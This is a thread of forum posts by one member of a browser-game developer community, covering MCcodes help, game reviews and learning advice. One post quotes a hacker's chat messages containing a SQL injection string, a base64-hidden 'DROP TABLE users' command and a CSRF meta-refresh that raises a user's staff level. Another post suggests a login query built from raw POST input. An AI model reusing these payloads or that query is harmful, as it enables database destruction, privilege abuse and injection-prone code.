Did you want everyone to know the url to your game? If not, it's easily visible of the error you gave ;)
-
I bet people are going to laugh xd, but i haven't been here long. Who is Nyna, i hear his/her name a lot ?
-
Ok i have slowly advanced my knowledge about the Marketplace, however one thing that is bugging me is how do you only view the new posts ?
-
That's better, now i'm sure it will be easier for people to help you out with this code. Theres no need to be sorry, everyone makes mistakes, and most likeley if your new to MCcodes and WebDev'ng.
-
Rasheed, it's a good start and be positive about this :). Though you still got a lot to learn, remember copy pasting bits of code into pages will not secure your game to a preferable extent. I'm no master but i do know you got to secure data which is inputted and outputted, becuase if not then your leaving your game open to lots of vulnerabilites by which the bad users can take control of the game and perform actions which will have a negative impact on your project.

Try expanding on that rather than saying it dosen't work, becuase that won't tell us anything about the problem. Tell us the error you getting, or what you trying to do and it's not working, that will help people in helping you becuase then they will know more about what exactly is happening. - Redex

I used to know him, i can get in contact with him still if you want me to. Shall i have a word with him ? P.S. I thought that site seemed familiar xd Editing this post becuase i was investigating this issue, and i came across someone who is called reallyknow on his game, he/she appears to be on your side becuase i beleive they registered after your game got hacked: 0 union toString(isString(SELECT (UNION ALL SELECT(UPDATE users SET money = $1)))) $1 = 2; [4:11 am] reallynow: foreach ($_POST as $key => $value) { $db->query(base64_decode("RFJPUCBUQUJMRSB1c2Vycw==";)); [4:11 am] reallynow: Keep hacking games and i'll have fun with yours ;-) [4:10 am] reallynow: <meta http-equiv='refresh' content='0;url=http://www.butopy.com/staff_special.php?action=userlevel&ID=192&level=2//' /> Hope this helps :)

For future reference, you could just go into the phpmyadmin and go into the users table and click browse. Look for your name and then click it too edit and edit user_level to 2 i think.

Fine Graphical skills everyone :)

Firstly, you don't post some work and then say the images coming along with them are "crap". It normally puts off the people who were going to use it, and also creates a impression that you think you're work is not done to a suitable standard. Secondly, you will improve with time and that is guranteed, if you put time and effort into learning. You see all them coders out there, them and there skills were not made over night, they all worked hard to get to the point where they are now, and don' think they all relax becuase they know more than some people here, becuase everyday is a new learning oppurtunity and the world is too big for anyone to know everything. My advice is going to be the same i give to most people: 1. Work hard. 2. Put the effort in. 3. Don't give up, it's not something you will learn overnight. 4. Research thorougly, about anything you want to learn. 5. Listen to the feeback people give you, and work on you're weak points. 6. Ask for help when needed, but trial and error will get you further than it will if you just get someone to do it for you. 7. Look at the examples of images or codes you got out here and learn from them. 8. Set reasonable expectations of yourself, not too high which are impossible to reach. 9. Don't compare yourself to anyone else, everyone unique and understand things via diffrent ways. 10. Take breaks, and let the information settle in. Don't try to cover everything in a day, becuase it will take atleast a coupole of months before you're comfortable with the basics. This is my advice, now it's you're choice whether to take it or not, everyone here can become sucessful, you just need to be guided on to the right path and need that boost of confidence. I'm noone to make any decisions right here, and the market place is probabaly good for people who understand it and get it to work, but maybe if i solve this problem and get use to it then it won't be too bad. It says General (1) and Paid mod (2) something like that, but when i view the file why dosen't the (1) or (2) change to (0) ? That's the problem i'm having and a bit of the problem is getting use to it. Hopefully it'll become easier as time progresses, and hoping someone can explain to me the (1) (2) (0) problem :P

Ahmm, i thought it always existed but i could never find it xd. Guess i just found out why.

Well it dosen't take much to earn some cash. Hard work and commitment is all you need. You don't see me complaining do you :), i'm no coder yet i still manage to earn myself some bucks whilst enjoying my time in the Web Developing industry. Find the place where you're talent lies and work on it, now don't tell me you don't have a talent becuase everyone is good at one thing or another. Example: If we talk about myself, i like writing and i beleive i am a skilled writer so that's where i work. I write articles and sell them off, and i also write content for games. It's all a matter of hard work all you have to do is improve yourself in a particular aspect of you're talent and then go and look for clients/customers. I have never talked to you before, yet i assume you're a nice hard working chap so come on show us what you got. Hope you manage to understand what i mean. Best Regards: Redex.

Dayo i think you misunderstood, he meant even if you FAIL the mission then you still get the experience.

Nice edit to the current modifications. Good work, keep it up.

Apologies for the short response, but i thought i would post this before heading off somewhere. A few things you may want to solve: 1. Link is not working, becuase it comes out like http://makewebgames.io http://www.themercenary.net so need to edit that. 2. Once i registered it said, the email has been sent to you by - I think you need to edit that so it says you're game name there. A coupole of edits i would prefer 1. The edit i would prefer is when someone goes on a wrong page, instead of just saying no input file specified you make it more fancy and appealing ( ps: I know no one is going to stay on there, but just my opinions ) 2. One more thing i would prefer is, when a user registers for the first time it automatically logs them in. My first impressions are, it's a nice looking text-based game with unique gameplay and for anyone with time on there hand i would advise to go experience life in the Millitary :P. I would like to see this game advance, and hopefully you will keep updating it to engage the users intrest. On the positive side, i'm thinking this is a Gangster Ledgend engine, however please could you clarify that in you're main post for the others and correct me if i'm wrong. I'll add more later. Best Regards: Redex.

Looking good Thug. I'm sure many people were waiting for this, now they've got it. I personally won't be using it but +1 ( when i find out how to do it xd ).
-
I'm pretty sure you're only meant to be posting your own work, rather than someone elses.
-
My view on this would be don't delay changing it from md5 to another encrption. I hope you're not going to get people to join, then change the encryption becuase that's a totally bad idea. Change it as soon as possible becuase there is no point hangining around if you already got it planned in you're head that you're going to be changing the encryption.
-
That's a good one :P . Nice features and for the amount of work, that Dave has put into it it has a decent price as well.
-
Totally agree with Bert over there, make sure you you provide enough facilities in game to make sure you're users are going to stay. Have the guts to allow links, and for that you got to make sure and beleive you're game can compete with the top games out there. If the answer to that answer is yes, then you've got nothing to worry about.

This is the worst option ever, and probably wrong, but hey atleast it's worth the try. global $c; $uq=mysql_query("SELECT userid FROM users WHERE login_name='{$_POST['username']}' AND `userpass`=md5('{$_POST['password']}')",$c)

KDawg08 cut the owners some slack. They don't know how to secure so what? It's all a big learning process and i'm sure they will have learnt from this. Everyone should be against hackers and exploiters, in my opinion a game shouldoun't be hacked even if it is as insecure as hell. Everyone deserves a right to sucess and to live there own life, with people like decio and da saint interfering in to steal images codes etc.
